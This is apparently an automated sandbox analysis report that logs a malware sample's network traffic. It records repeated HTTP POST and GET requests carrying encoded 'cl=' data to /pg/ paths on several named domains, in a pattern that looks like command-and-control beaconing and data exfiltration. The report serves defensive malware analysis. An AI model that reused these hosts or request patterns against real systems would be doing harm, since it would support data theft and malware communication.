cl=1lf-NjjthWFSNY2_kR8W8el3jOnexlCSFQ1TICCSmdiIWfhjEHoJAPvseznCg7mGRcAbjy2BUhFvYfh5cLpeqmi6iQM7Pro_QDOBoHng6mD4UD~k88IURGR4iONxgU68hR8oIWN-uSkfbjloU3ohR9KnEXn8dgybUSs9p8Jkr78HBmorcYyzNr4vD_iyztrZZYXMWL0vJ-uU84SlvKc0g7P7MLNsD54zOfCgYZfbKpZihDaO2HneSSpJRadXjJ(CsqybRFXSCQCNdGYng6xcJmVyOc2whkfQI1Nnslkjci(td5FL4bMpyWCdzLszWeI-JTlqcq7ihID7jTw5wqlMnwPRZayIgEklJoayCzipszll7_0WBqQa9pSjMDySU9VmDgMqPVYiBzTtU9aEfg).).
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.msdcong.comConnection: closeContent-Length: 161308Cache-Control: no-cacheOrigin: http://www.msdcong.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.msdcong.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 31 6c 66 2d 4e 6e 66 66 73 47 52 44 4b 71 65 52 31 79 51 5f 31 74 6c 50 6c 2d 7a 61 34 57 54 72 4d 67 49 49 49 43 53 4f 7a 4d 7a 52 53 5f 39 6a 43 42 38 45 62 66 76 74 59 7a 6e 42 78 72 71 2d 4f 65 41 54 6a 7a 43 76 55 68 4e 67 57 39 70 47 63 62 70 4e 72 47 6d 73 7a 77 49 61 50 74 70 56 54 68 6a 48 74 47 62 67 6e 43 76 36 4a 57 69 42 37 5f 63 48 66 53 4a 35 6b 5f 6c 6a 67 6e 28 4c 68 79 42 48 65 48 52 38 6b 41 35 64 58 43 56 41 51 67 4d 69 55 74 65 73 42 55 62 76 58 68 75 66 58 54 73 31 6d 5a 39 6a 69 72 46 58 58 55 78 57 4a 35 47 4b 42 59 77 64 44 2d 6e 4e 37 37 43 64 54 37 6a 55 56 36 34 42 48 72 57 53 69 5f 79 55 6b 6f 6b 46 73 62 28 55 51 36 39 37 55 5a 55 69 65 4d 71 77 62 39 54 57 48 37 74 75 70 57 65 79 31 51 28 6f 50 43 5a 32 59 39 68 41 32 71 33 4b 72 73 4b 35 55 6c 58 70 52 51 43 42 4a 48 34 50 69 62 31 48 4a 33 6c 4d 41 37 4b 76 76 55 7a 52 4a 7a 45 61 69 6b 6b 32 50 69 58 68 4a 62 63 32 7a 75 73 79 35 42 79 68 28 62 73 75 57 59 63 35 4a 54 6c 49 63 76 50 4d 68 37 44 37 68 47 38 75 7a 49 4e 41 68 77 50 51 63 4d 53 47 70 57 78 34 4a 73 32 79 43 43 53 48 72 55 42 6c 28 74 73 5a 42 4f 38 61 74 70 53 6a 46 6a 7a 74 51 4d 30 42 4a 55 63 52 4e 6b 6c 6e 56 56 71 31 63 2d 37 70 42 74 34 5f 44 62 71 77 6a 55 61 53 78 2d 71 63 74 37 4a 6c 6f 33 42 75 50 5a 59 38 61 6c 4b 4c 69 4d 52 38 51 54 46 71 33 77 4f 70 4e 4a 5a 77 4f 68 71 46 71 68 51 72 74 74 7a 6c 79 57 65 39 57 36 55 70 4b 4c 69 56 33 47 62 46 50 55 6c 74 51 53 39 6f 6e 77 4b 6f 39 38 41 74 45 6c 47 73 37 48 79 70 31 4e 4b 79 6b 65 78 31 33 4b 4a 6a 38 43 56 71 64 55 55 34 51 69 54 52 
6c 66 46 38 58 76 6c 73 51 38 76 62 6a 4a 65 4c 69 69 4b 47 36 59 41 6c 6c 71 4c 67 4f 44 30 67 58 44 73 37 6e 45 58 63 78 44 61 34 64 66 79 4f 52 6d 57 46 37 59 65 4f 33 50 36 6e 67 77 54 32 56 6c 35 76 6b 39 77 44 69 44 7e 64 62 78 49 58 74 4f 51 59 62 45 6c 79 73 50 50 66 61 74 4f 77 59 53 41 56 63 4e 31 7a 72 77 73 43 48 5f 71 2d 61 33 50 70 6e 59 59 35 70 48 4b 5a 70 34 57 4c 56 30 58 65 63 38 51 47 41 67 78 58 42 4b 73 45 63 46 4d 33 6e 44 6d 6e 61 55 6e 57 37 54 57 6a 67 42 32 48 5a 2d 4e 4a 39 74 39 61 32 67 79 37 37 49 4d 65 4b 77 34 44 36 6a 74 6d 75 57 56 69 71 42 54 61 74 79 48 64 72 6f 46 62 53 53 5a 71 63 48 61 6c 65 72 4b 38 62 49 32 61 77 77 64 45 70 4d 71 4e 79 43 35 6e 65 50 79 4c 6a 57 77 39 70 4a 55 30 31 58 78 43 4a 31 7e 4c 6a 70 67 63 79 36 28 64 54 4c 6e 5f 69 4e 76 45 37 4b 59 76 46 71 37 43 49 36 61 61 79 77 74 70 39 53 69 36 6a 78 4e 5f 35 31 37 76 42 35 37 38 67 47 4e 4b 62 6c 65 4a 56 7a 64 6d 64 62 78 64 55 38 6e 46 51 52 6b 65 7e 37 28 61 67 4b 64 32 65 35 36 2d 61 51 32 62 41
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.wshlzhx.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.wshlzhx.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.wshlzhx.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 41 4d 33 30 55 65 78 69 6c 71 37 37 6b 65 44 4a 57 6e 34 6b 65 6f 54 4f 30 76 66 4b 56 6b 4b 61 4b 53 68 56 77 4c 44 76 53 44 65 68 6c 2d 58 72 42 31 38 54 74 52 47 6e 6e 6f 28 63 61 6e 72 44 62 77 68 62 4f 42 58 75 32 58 47 42 52 37 4c 44 5a 4b 46 52 54 30 30 50 73 44 55 35 55 78 59 63 33 52 45 55 52 53 70 58 72 4b 62 6e 4a 55 69 64 72 43 6b 34 52 57 62 75 37 36 57 4d 41 71 35 6d 43 35 70 58 54 32 38 5a 78 70 47 75 4b 49 6b 32 6a 55 32 56 35 39 43 46 69 5a 65 66 6d 37 47 43 45 53 51 51 73 52 57 67 72 2d 79 71 59 6d 78 6d 70 45 75 78 38 38 43 46 59 70 72 31 48 4d 34 59 71 73 55 77 6c 4a 30 39 5a 35 30 59 41 72 79 54 55 6b 5a 58 28 76 39 45 74 5a 7a 69 55 79 6e 6a 63 45 69 41 55 52 75 68 6d 63 4e 72 54 41 53 54 32 34 58 48 55 79 7e 74 64 5f 45 43 63 4c 38 79 42 61 34 76 64 30 43 6e 7e 6f 30 6a 78 36 4f 4b 75 55 74 54 32 48 36 54 74 4d 4a 30 79 79 5a 4b 38 56 47 4c 49 61 79 58 61 7a 4a 67 32 56 4e 56 76 31 79 5f 49 45 35 57 32 6c 59 79 53 6b 37 61 6f 35 48 34 54 70 72 54 50 6e 76 36 66 79 77 36 46 58 6a 64 55 54 4e 4f 64 63 68 43 43 5a 76 32 47 6a 31 39 36 6d 67 47 61 36 6a 53 36 75 42 57 4e 56 61 46 4d 64 4a 49 46 4c 62 39 4e 63 78 74 66 4e 5a 67 39 68 42 54 69 44 4f 30 55 4a 66 62 6f 51 29 2e 00 29 2e 00 00 00 00 00 Data Ascii: 
cl=AM30Uexilq77keDJWn4keoTO0vfKVkKaKShVwLDvSDehl-XrB18TtRGnno(canrDbwhbOBXu2XGBR7LDZKFRT00PsDU5UxYc3REURSpXrKbnJUidrCk4RWbu76WMAq5mC5pXT28ZxpGuKIk2jU2V59CFiZefm7GCESQQsRWgr-yqYmxmpEux88CFYpr1HM4YqsUwlJ09Z50YAryTUkZX(v9EtZziUynjcEiAURuhmcNrTAST24XHUy~td_ECcL8yBa4vd0Cn~o0jx6OKuUtT2H6TtMJ0yyZK8VGLIayXazJg2VNVv1y_IE5W2lYySk7ao5H4TprTPnv6fyw6FXjdUTNOdchCCZv2Gj196mgGa6jS6uBWNVaFMdJIFLb9NcxtfNZg9hBTiDO0UJfboQ).).
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.wshlzhx.comConnection: closeContent-Length: 161308Cache-Control: no-cacheOrigin: http://www.wshlzhx.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.wshlzhx.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 41 4d 33 30 55 63 52 32 32 4b 28 51 76 4d 61 36 47 41 67 46 54 59 4c 62 79 66 62 77 4b 6a 47 67 55 77 31 6a 77 4b 79 48 64 69 4f 7a 79 75 48 72 48 7a 67 49 67 52 47 6b 32 34 28 66 4e 33 6e 5f 55 79 52 54 4f 41 54 49 32 58 4f 4f 62 63 37 47 5a 36 46 38 54 55 49 5f 75 44 51 59 55 7a 74 30 30 7a 6f 63 55 53 6c 58 6c 65 28 68 51 55 65 47 73 47 4d 33 50 32 32 71 33 62 50 4d 41 64 70 53 44 62 56 35 46 6a 59 62 69 71 61 70 47 73 5a 52 30 54 43 67 6d 64 47 43 37 6f 47 4d 70 34 69 47 48 54 52 77 70 51 57 6a 30 64 43 65 49 78 56 45 69 52 4c 46 77 4d 79 33 59 72 4c 44 5a 65 74 45 75 74 49 34 6b 39 6b 62 4e 63 55 61 65 73 65 4c 44 33 77 78 35 76 73 57 31 61 6e 48 44 32 58 4d 64 43 76 64 4a 6c 44 66 67 6f 64 6e 59 56 76 6b 33 4c 37 31 59 54 50 35 52 65 41 5a 4f 61 64 78 43 63 41 37 5a 55 44 4a 38 6f 31 78 7e 75 62 31 6c 56 6c 59 35 30 7a 79 73 50 5a 6a 34 43 31 50 39 58 43 44 47 65 6e 5f 57 67 5a 73 39 47 55 73 6b 45 32 6b 42 54 35 59 6f 56 5a 71 53 6d 43 59 6f 35 48 65 54 74 28 70 4f 57 72 36 65 6d 6b 54 47 32 6a 5a 53 54 4e 70 54 73 78 41 4d 4a 44 6d 47 6e 5a 39 37 57 52 64 62 4e 66 53 70 72 46 56 4e 30 61 46 43 4e 4a 49 49 72 62 7a 43 75 63 39 51 64 64 42 7e 69 63 59 67 57 48 48 65 4b 6d 6f 32 54 79 6c 4b 65 37 54 50 63 51 65 76 50 77 64 6d 36 30 32 41 77 51 6d 46 41 65 4d 62 7a 48 4c 5a 51 41 34 42 68 6d 79 28 2d 37 66 61 72 6a 63 4b 39 53 42 78 57 62 79 79 4c 45 31 49 33 67 61 68 49 72 43 79 61 35 30 63 38 28 56 41 6d 74 4d 74 5a 64 58 4f 37 6d 46 4f 5f 72 4f 38 2d 63 39 57 33 36 79 51 47 71 2d 70 33 6d 41 34 7a 68 38 72 48 73 71 66 54 68 4e 31 4b 69 39 
76 62 31 32 41 35 77 79 36 73 64 73 49 35 35 73 4f 4d 4e 75 66 70 76 41 28 6c 47 51 33 53 6a 37 63 56 63 75 6f 4e 4a 36 6a 6d 51 47 61 65 35 34 68 64 75 31 38 31 55 50 4c 32 73 7a 58 65 50 64 68 43 6d 78 74 59 76 79 6e 7a 6d 65 56 67 75 63 59 31 70 41 61 51 6c 67 67 6f 6b 4d 65 4e 35 70 33 4a 31 70 47 64 70 4a 37 76 65 49 65 49 43 74 72 71 5a 49 54 38 28 4e 77 78 76 32 6e 4d 55 44 32 45 6d 46 4e 34 64 4e 6f 4c 74 75 7e 47 51 55 59 41 6c 42 6e 4f 43 30 55 46 54 4b 46 63 6c 61 6f 4d 39 54 30 61 4b 54 69 58 73 6f 65 76 4a 51 35 77 73 58 49 36 6b 59 35 56 53 35 73 4e 38 72 42 68 74 79 58 48 55 42 72 32 42 54 46 76 31 44 35 6d 72 77 57 61 4e 37 45 4b 6f 75 42 5a 44 38 6d 6f 32 64 79 4e 57 4d 62 51 69 73 43 56 59 4f 55 32 4f 71 6e 53 45 4e 74 4b 66 4b 4c 4b 7a 67 51 67 7e 65 54 72 4f 71 52 7a 58 71 73 32 75 45 42 47 4f 72 58 48 58 59 6a 76 48 6b 4c 4d 39 4c 4b 30 35 4a 49 62 36 5f 31 35 63 44 76 35 51 49 48 39 45 44 6a 6e 64 50 38 4f 6f 7a 34 34 79 69 76 62 50 73 4b 38 63 2d 79 50 73 37 7a 78 77 70 6d 72 33 74 44
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.zcn4.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.zcn4.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.zcn4.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 78 48 6a 5f 6a 2d 73 71 48 6b 64 2d 74 76 34 51 59 67 69 5f 38 44 54 32 6b 59 69 66 68 4c 69 5f 46 37 58 44 43 4e 66 33 28 48 6f 61 39 31 4b 67 57 56 5a 57 72 71 45 53 47 47 4f 50 69 52 38 6d 4a 59 31 50 52 57 70 56 59 54 33 67 37 4c 74 59 57 30 64 59 56 4b 77 63 78 63 38 38 79 55 78 72 6a 4e 6a 50 74 65 4d 53 65 6b 72 54 37 42 74 61 50 39 69 2d 6e 58 4e 71 6c 62 4c 4f 62 33 7a 4b 30 5a 37 53 79 5a 68 5a 76 75 72 33 49 2d 73 41 4e 6d 6a 50 6a 42 61 66 30 62 69 42 79 70 54 79 48 37 54 57 57 6d 46 33 62 6b 43 55 51 4a 63 64 75 4a 31 61 6b 4f 5a 76 74 73 65 59 57 57 74 2d 32 59 48 63 54 56 69 72 33 4e 39 34 4c 42 35 6c 33 4f 7a 38 43 33 6b 64 73 33 4b 45 33 33 6d 5f 79 75 65 51 6c 6e 63 51 7e 79 63 6b 30 56 70 58 74 67 51 32 71 64 62 44 44 6b 4e 36 37 54 28 57 44 72 6a 4d 68 37 77 4b 37 4a 44 69 41 49 51 77 37 47 6b 70 66 70 49 41 28 74 39 34 74 5a 49 70 6b 62 63 47 48 67 59 59 32 6e 44 54 6d 61 36 4a 4b 5a 4c 61 55 46 61 61 43 35 77 32 58 72 77 61 62 77 64 6d 72 59 6a 77 74 41 4e 34 4f 70 69 49 45 6c 53 50 4f 72 32 64 71 35 4b 6d 71 75 73 4e 58 71 6d 51 48 74 35 4c 66 69 59 6a 57 5f 64 47 74 39 69 6c 31 6e 38 4a 64 76 6a 52 35 38 64 67 4e 59 45 4d 6e 53 52 6d 33 65 57 42 75 76 62 63 6a 77 29 2e 00 55 4a 66 62 6f 51 29 Data Ascii: 
cl=xHj_j-sqHkd-tv4QYgi_8DT2kYifhLi_F7XDCNf3(Hoa91KgWVZWrqESGGOPiR8mJY1PRWpVYT3g7LtYW0dYVKwcxc88yUxrjNjPteMSekrT7BtaP9i-nXNqlbLOb3zK0Z7SyZhZvur3I-sANmjPjBaf0biBypTyH7TWWmF3bkCUQJcduJ1akOZvtseYWWt-2YHcTVir3N94LB5l3Oz8C3kds3KE33m_yueQlncQ~yck0VpXtgQ2qdbDDkN67T(WDrjMh7wK7JDiAIQw7GkpfpIA(t94tZIpkbcGHgYY2nDTma6JKZLaUFaaC5w2XrwabwdmrYjwtAN4OpiIElSPOr2dq5KmqusNXqmQHt5LfiYjW_dGt9il1n8JdvjR58dgNYEMnSRm3eWBuvbcjw).UJfboQ)
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.zcn4.comConnection: closeContent-Length: 161308Cache-Control: no-cacheOrigin: http://www.zcn4.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.zcn4.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 78 48 6a 5f 6a 36 77 55 42 55 59 6c 28 4a 46 6c 66 54 4f 65 6f 6d 54 77 6f 49 32 70 7e 49 79 42 48 72 37 54 43 4e 50 7a 33 6c 52 47 34 55 61 67 64 77 74 49 6d 71 45 4e 41 47 4f 4f 6d 52 67 77 41 76 49 44 52 58 64 5f 59 54 28 68 79 74 42 64 58 6b 64 31 45 61 30 67 67 4d 6f 37 79 53 77 4c 6a 76 4f 63 6f 65 41 53 41 45 7a 52 69 41 39 4e 47 63 75 78 71 48 51 42 70 36 53 51 62 6e 50 32 30 37 48 30 6a 64 68 68 71 64 32 31 44 65 63 73 4a 31 44 51 38 68 4f 55 6f 49 65 6f 74 59 66 32 47 36 53 6a 4b 58 46 30 57 30 71 61 47 37 46 67 71 38 52 4a 33 75 49 63 74 72 69 69 4f 56 4a 76 79 65 43 52 52 6e 47 42 28 5a 6c 36 45 51 35 39 6d 64 62 42 50 57 31 4a 6b 55 65 68 38 30 53 71 28 49 44 62 72 6c 73 72 34 44 67 57 38 45 5a 6a 39 41 6b 2d 6d 38 72 38 4a 48 63 36 73 79 66 6b 4e 4a 50 6d 6b 62 78 6d 6f 5a 44 75 49 61 6f 4d 74 48 67 32 4e 70 34 69 7e 74 45 6b 6a 6f 6b 6f 70 35 59 34 4e 6b 30 6a 77 45 7a 48 74 49 54 2d 50 4c 6e 76 64 57 48 72 66 4a 78 35 58 70 59 56 62 77 64 55 72 5a 69 56 69 52 5a 34 50 34 43 62 48 47 37 41 47 4c 33 66 6f 74 75 65 6b 38 34 64 58 71 7e 51 45 34 64 79 66 52 49 6a 61 4a 78 48 74 63 69 6c 32 58 38 4a 45 66 69 4e 34 4f 73 52 54 39 51 75 6d 6b 51 79 32 70 48 39 36 5f 79 54 67 6d 6c 6b 44 37 4f 79 33 4f 77 69 74 58 51 38 67 52 39 33 39 59 54 6a 35 77 4d 46 28 72 47 49 44 61 79 42 41 74 63 30 4e 35 4a 49 62 71 51 31 73 6c 41 5f 44 73 41 70 78 70 53 50 67 33 61 59 70 4a 62 5f 62 43 79 35 4a 4c 54 73 70 76 41 72 4e 4b 41 5f 43 73 73 54 33 7a 67 6a 42 34 4b 56 37 51 6a 44 7a 7a 39 33 64 73 4d 6a 4a 77 62 44 65 57 69 78 75 72 69 57 47 31 61 36 67 46 78 
79 35 75 72 54 68 47 7a 31 62 59 30 51 33 68 63 42 69 63 33 4d 68 48 39 62 78 58 4f 66 59 68 28 42 79 4e 4e 4a 5a 56 6d 4a 39 56 50 63 33 49 49 6f 6b 4b 33 39 44 4a 30 34 32 52 46 53 6a 59 39 66 77 50 30 5a 67 51 48 53 43 56 68 4b 7a 46 42 74 41 62 71 4b 62 51 32 43 37 55 79 42 31 5f 4c 37 58 55 35 4c 74 51 61 67 31 39 34 76 4a 48 44 32 74 62 59 4c 61 70 77 31 41 61 6a 63 4e 6e 54 6e 64 65 4b 30 70 45 6b 41 55 44 74 4d 56 2d 38 50 30 57 72 67 6d 30 48 33 74 77 44 59 6b 5f 32 4a 48 41 41 48 56 76 33 38 33 39 44 63 4e 47 47 4a 39 2d 7a 56 66 47 59 2d 72 35 32 5f 53 34 38 39 6e 30 52 50 57 50 6b 33 75 68 42 38 6a 47 77 72 55 32 32 67 43 4f 4c 43 62 57 34 67 70 56 47 33 77 72 32 56 42 65 4a 77 57 71 73 43 4d 77 74 77 45 65 57 78 76 71 71 50 62 45 52 78 47 71 69 56 46 67 75 41 52 77 4a 63 4d 39 31 74 52 55 6b 69 70 61 52 58 6d 4c 53 2d 70 48 34 62 67 70 67 77 38 61 55 4f 6c 66 4e 30 74 72 69 63 6a 70 4b 43 65 59 42 55 53 6e 63 6b 34 73 49 4b 6c 34 4c 50 64 74 39 45 6e 34 34 42 51 59 59 65 28 42 68 4e 55 50 68 76
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /pg/?cl=e4vtZaDIaVjVbVsGLqeRzvTTrFG4L6g9xJG3vo9VJEHdPRYNiZrjWKGrMWwHCGmSe8hL&2drl7=sL04ivN0C HTTP/1.1 | Host: www.alwaysbucheon.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /pg/?cl=bp3gRoXoP4yEgK1sgJSYJfU+FssScB904rbINqXJ/OBc+k4pi0Qt4zKRKRSxUz2ykIhM&2drl7=sL04ivN0C HTTP/1.1 | Host: www.frengeen.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /pg/?cl=RA/4Irk5P4f6SUywnqVLcdKqFQC5UyywDrBVn7AQH3o0gkoTjo44CDVTLwAwj/6QVTo4&2drl7=sL04ivN0C HTTP/1.1 | Host: www.aalldxea.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /pg/?cl=9HTETHSv3BkodYmkolV6gIdBk+nR/n7VQF8IV1eTi9ORfvNnIi0cIKnqFVKcp7KNM91B&2drl7=sL04ivN0C HTTP/1.1 | Host: www.msdcong.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /pg/?cl=Iu7OK7c719yg5+rObwJSE42h0tf2fXC4Qmo10pi2UhOWitvONWxHvB/i0oS+D3HNIxcl&2drl7=sL04ivN0C HTTP/1.1 | Host: www.wshlzhx.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /pg/?cl=5lvF9aNASzw0/ednaHrHq3bCrY2s26KKXO6afqfWx34cy2T8YgpekM9WcQWNtwYcYtQM&2drl7=sL04ivN0C HTTP/1.1 | Host: www.zcn4.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /pg/?cl=e4vtZaDIaVjVbVsGLqeRzvTTrFG4L6g9xJG3vo9VJEHdPRYNiZrjWKGrMWwHCGmSe8hL&2drl7=sL04ivN0C HTTP/1.1 | Host: www.alwaysbucheon.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: www.hot7slot.com
Posts data to webserver
Source: unknownHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.frengeen.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.frengeen.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frengeen.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 54 4c 37 61 50 50 57 30 65 64 37 38 33 61 70 2d 6b 65 76 75 62 72 6f 67 52 39 4d 46 4b 51 35 6d 69 73 75 4d 5a 72 69 52 33 65 35 6d 28 51 77 49 6c 33 68 6f 77 30 4c 56 63 69 69 31 58 41 47 49 79 34 67 6e 75 45 4b 44 36 4c 4c 4e 6d 41 33 41 58 62 6c 45 4c 57 6c 45 75 61 7e 5f 79 31 4a 32 32 43 7e 33 4d 53 41 7a 41 38 50 47 36 41 36 41 72 54 56 49 33 68 6f 55 57 4b 6c 6c 51 6d 51 65 76 5a 4c 54 38 70 6b 35 4c 35 43 72 66 70 71 69 46 73 6b 58 35 64 58 47 6d 37 74 55 6a 42 66 58 61 31 6c 66 37 78 67 79 78 56 77 54 4c 71 50 75 5a 45 78 41 4e 31 48 39 55 75 36 51 53 5a 43 4e 5a 7a 52 62 6d 37 41 50 77 55 67 33 7e 71 6d 61 32 5a 6c 6c 42 72 55 63 38 44 71 77 4d 6f 39 59 6b 42 58 42 69 5a 63 61 55 37 59 55 28 63 53 39 55 77 69 4d 36 78 71 69 78 72 67 59 43 75 38 6f 59 5f 61 79 75 57 67 43 6e 67 36 2d 71 61 76 35 45 4b 54 44 62 5f 47 5a 59 48 42 47 58 73 71 33 78 6b 39 38 34 76 70 71 38 79 6a 6d 51 64 37 46 42 55 36 55 75 58 57 35 49 6f 39 33 65 6d 54 68 38 58 41 5f 65 7a 5a 69 4f 41 76 4e 43 51 35 41 30 47 31 36 76 69 4c 6f 55 6b 45 79 5a 5a 76 70 73 76 56 5a 34 56 76 42 4d 77 54 79 78 54 55 50 51 51 66 4b 71 41 52 30 76 48 73 30 7e 31 49 4f 31 51 73 64 49 36 4d 65 69 5f 47 79 45 6e 79 61 4b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
cl=TL7aPPW0ed783ap-kevubrogR9MFKQ5misuMZriR3e5m(QwIl3how0LVcii1XAGIy4gnuEKD6LLNmA3AXblELWlEua~_y1J22C~3MSAzA8PG6A6ArTVI3hoUWKllQmQevZLT8pk5L5CrfpqiFskX5dXGm7tUjBfXa1lf7xgyxVwTLqPuZExAN1H9Uu6QSZCNZzRbm7APwUg3~qma2ZllBrUc8DqwMo9YkBXBiZcaU7YU(cS9UwiM6xqixrgYCu8oY_ayuWgCng6-qav5EKTDb_GZYHBGXsq3xk984vpq8yjmQd7FBU6UuXW5Io93emTh8XA_ezZiOAvNCQ5A0G16viLoUkEyZZvpsvVZ4VvBMwTyxTUPQQfKqAR0vHs0~1IO1QsdI6Mei_GyEnyaKA).
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Mar 2020 17:58:44 GMTServer: ApacheLast-Modified: Thu, 26 Mar 2020 02:08:11 GMTETag: "720-5a1b874e878c0"Accept-Ranges: bytesContent-Length: 1824Connection: closeContent-Type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 6f 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 49 53 54 4f 52 59 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 2f 74 31 2e 64 61 75 6d 63 64 6e 2e 6e 65 74 2f 74 69 73 74 6f 72 79 5f 61 64 6d 69 6e 2f 77 77 77 2f 73 74 79 6c 65 2f 74 6f 70 2f 66 6f 6e 74 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 2f 74 31 2e 64 61 75 6d 63 64 6e 2e 6e 65 74 2f 74 69 73 74 6f 72 79 5f 61 64 6d 69 6e 2f 77 77 77 2f 73 74 79 6c 65 2f 74 6f 70 2f 65 72 72 6f 72 5f 32 30 31 39 30 38 31 34 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6b 61 6b 61 6f 49 6e 64 65 78 22 3e 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 6b 61 6b 61 6f 42 6f 64 79 22 3e eb b3 b8 eb ac b8 20 eb b0 94 eb a1 9c ea b0 80 ea b8 b0 3c 2f 61 3e 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 6b 61 6b 61 6f 47 6e 62 22 3e eb a9 94 eb 89 b4 20 eb b0 94 eb a1 9c ea b0 80 ea b8 b0 3c 
2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 6b 61 6b 61 6f 57 72 61 70 22 20 63 6c 61 73 73 3d 22 74 69 73 74 6f 72 79 5f 74 79 70 65 33 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6b 61 6b 61 6f 43 6f 6e 74 65 6e 74 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 4d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6d 41 72 74 69 63 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 6e 65 72 5f 65 72 72 6f 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 5f 74 69 73 74 6f 72 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 69 64 3d 22 6b 61 6b 61 6f 42 6f 64 79 22 20 63 6c 6
Urls found in memory or binary data
